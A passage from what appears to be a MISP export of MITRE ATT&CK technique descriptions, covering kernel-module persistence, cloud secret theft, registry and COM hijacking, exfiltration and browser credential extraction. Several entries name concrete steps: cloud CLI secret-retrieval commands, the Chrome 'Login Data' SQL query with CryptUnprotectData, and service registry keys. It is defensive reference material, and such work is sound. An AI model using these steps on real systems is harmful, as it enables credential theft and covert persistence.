Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)

Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)

Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)

The tag is: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006"

Table 5508. Table References

Links

http://tldp.org/HOWTO/Module-HOWTO/x197.html

http://www.megasecurity.org/papers/Rootkits.pdf

http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html

https://attack.mitre.org/techniques/T1547/006

https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/

https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf

https://developer.apple.com/support/kernel-extensions/

https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux

https://github.com/f0rb1dd3n/Reptile

https://github.com/m0nad/Diamorphine

https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/

https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/

https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/

https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web

https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html

https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/

https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/

https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Cloud Secrets Management Stores - T1555.006

Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.

Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.

If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as get-secret-value in AWS, gcloud secrets describe in GCP, and az key vault secret show in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)

Note: this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Secrets Management Stores - T1555.006"

Table 5509. Table References

Links

https://attack.mitre.org/techniques/T1555/006

https://cloud.google.com/secret-manager/docs/view-secret-details

https://docs.aws.amazon.com/secretsmanager/latest/userguide/retrieving-secrets.html

https://learn.microsoft.com/en-us/azure/key-vault/secrets/quick-create-cli

https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud

https://sysdig.com/blog/scarleteel-2-0/

Modify Cloud Compute Configurations - T1578.005

Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.

For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)

Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Cloud Compute Configurations - T1578.005"

Table 5510. Table References

Links

https://attack.mitre.org/techniques/T1578/005

https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute

https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121

https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/

https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/

Services Registry Permissions Weakness - T1574.011

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service’s binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the <code>FailureCommand</code> key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)

The <code>Performance</code> key contains the name of a driver service’s performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the <code>Performance</code> key is not already present and if an adversary-controlled user has the <code>Create Subkey</code> permission, adversaries may create the <code>Performance</code> key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)

Adversaries may also add the <code>Parameters</code> key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll</code>.(Citation: malware_hides_service)

The tag is: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011"

Table 5511. Table References

Links

https://attack.mitre.org/techniques/T1574/011

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree

https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN

https://itm4n.github.io/windows-registry-rpceptmapper-eop/

https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html

https://twitter.com/r0wdy_/status/936365549553991680

https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost

Component Object Model Hijacking - T1546.015

Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model) References to various COM objects are stored in the Registry.

Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary’s code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015"

Table 5512. Table References

Links

https://attack.mitre.org/techniques/T1546/015

https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

https://msdn.microsoft.com/library/ms694363.aspx

https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com

Deobfuscate/Decode Files or Information - T1140

Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)

Sometimes a user’s action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"

Table 5513. Table References

Links

https://attack.mitre.org/techniques/T1140

https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/

https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/

https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

Obtain domain/IP registration information - T1251

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1251).

For a computing resource to be accessible to the public, domain names and IP addresses must be registered with an authorized organization. (Citation: Google Domains WHOIS) (Citation: FunAndSun2012) (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain domain/IP registration information - T1251"

Table 5514. Table References

Links

https://attack.mitre.org/techniques/T1251

Assign KITs/KIQs into categories - T1228

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1228).

Leadership organizes Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) into three types of categories and creates more if necessary. An example of a description of key players KIT would be when an adversary assesses the cyber defensive capabilities of a nation-state threat actor. (Citation: Herring1999)

The tag is: misp-galaxy:mitre-attack-pattern="Assign KITs/KIQs into categories - T1228"

Table 5515. Table References

Links

https://attack.mitre.org/techniques/T1228

Receive operator KITs/KIQs tasking - T1235

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1235).

Analysts may receive intelligence requirements from leadership and begin research process to satisfy a requirement. Part of this process may include delineating between needs and wants and thinking through all the possible aspects associating with satisfying a requirement. (Citation: FBIIntelligencePrimer)

The tag is: misp-galaxy:mitre-attack-pattern="Receive operator KITs/KIQs tasking - T1235"

Table 5516. Table References

Links

https://attack.mitre.org/techniques/T1235

Data Transfer Size Limits - T1030

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

The tag is: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030"

Table 5517. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1030

Data from Local System - T1005

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"

Table 5518. Table References

Links

https://attack.mitre.org/techniques/T1005

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733

https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits

https://www.us-cert.gov/ncas/alerts/TA18-106A

Exfiltration Over C2 Channel - T1041

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041"

Table 5519. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1041

Exploitation of Remote Services - T1210

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)

Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210"

Table 5520. Table References

Links

https://attack.mitre.org/techniques/T1210

https://nvd.nist.gov/vuln/detail/CVE-2014-7169

https://nvd.nist.gov/vuln/detail/CVE-2016-6662

https://nvd.nist.gov/vuln/detail/CVE-2017-0176

https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/

System Network Configuration Discovery - T1016

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](ifconfig(https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

The tag is: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016"

Table 5521. Table References

Links

https://attack.mitre.org/techniques/T1016

https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits

https://www.us-cert.gov/ncas/alerts/TA18-106A

Replication Through Removable Media - T1091

Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media’s firmware itself.

Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).

The tag is: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091"

Table 5522. Table References

Links

https://attack.mitre.org/techniques/T1091

https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf

https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/

https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html

Exploitation for Client Execution - T1203

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.

Several types exist:

Browser-based Exploitation

Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"

Table 5523. Table References

Links

https://attack.mitre.org/techniques/T1203

Change Default File Association - T1042

When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example: * <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code> * <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code> * <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1042"

Table 5524. Table References

Links

http://msdn.microsoft.com/en-us/library/bb166549.aspx

https://attack.mitre.org/techniques/T1042

https://capec.mitre.org/data/definitions/556.html

https://docs.microsoft.com/windows-server/administration/windows-commands/assoc

https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd

File and Directory Discovery - T1420

Adversaries may enumerate files and directories or search in specific device locations for desired information within a filesystem. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) during automated discovery to shape follow-on behaviors, including deciding if the adversary should fully infect the target and/or attempt specific actions.

On Android, Linux file permissions and SELinux policies typically stringently restrict what can be accessed by apps without taking advantage of a privilege escalation exploit. The contents of the external storage directory are generally visible, which could present concerns if sensitive data is inappropriately stored there. iOS’s security architecture generally restricts the ability to perform any type of [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) without use of escalated privileges.

The tag is: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420"

Table 5525. Table References

Links

https://attack.mitre.org/techniques/T1420

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html

Data from Removable Media - T1025

Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.

Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025"

Table 5526. Table References

Links

https://attack.mitre.org/techniques/T1025

Exfiltration Over Physical Medium - T1052

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052"

Table 5527. Table References

Links

https://attack.mitre.org/techniques/T1052

Data from Configuration Repository - T1602

Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.

Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602"

Table 5528. Table References

Links

https://attack.mitre.org/techniques/T1602

https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3

https://us-cert.cisa.gov/ncas/alerts/TA17-156A

https://www.us-cert.gov/ncas/alerts/TA18-106A

Obfuscated Files or Information - T1027

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user’s action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"

Table 5529. Table References

Links

https://attack.mitre.org/techniques/T1027

https://github.com/danielbohannon/Revoke-Obfuscation

https://github.com/itsreallynick/office-crackros

https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/

https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html

https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/

https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf

https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/

Communication Through Removable Media - T1092

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

The tag is: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092"

Table 5530. Table References

Links

https://attack.mitre.org/techniques/T1092

Modify Cached Executable Code - T1403

ART (the Android Runtime) compiles optimized code on the device itself to improve performance. An adversary may be able to use escalated privileges to modify the cached code in order to hide malicious behavior. Since the code is compiled on the device, it may not receive the same level of integrity checks that are provided to code running in the system partition.(Citation: Sabanal-ART)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Cached Executable Code - T1403"

Table 5531. Table References

Links

https://attack.mitre.org/techniques/T1403

https://www.blackhat.com/docs/asia-15/materials/asia-15-Sabanal-Hiding-Behind-ART-wp.pdf

Credentials from Web Browsers - T1503

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos Olympic Destroyer 2018)

Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)

Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary’s objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1503"

Table 5532. Table References

Links

https://attack.mitre.org/techniques/T1503

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata

https://github.com/putterpanda/mimikittenz

https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html

https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign

Data from Cloud Storage - T1530

Adversaries may access data from cloud storage.

Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform.

In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)).

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.

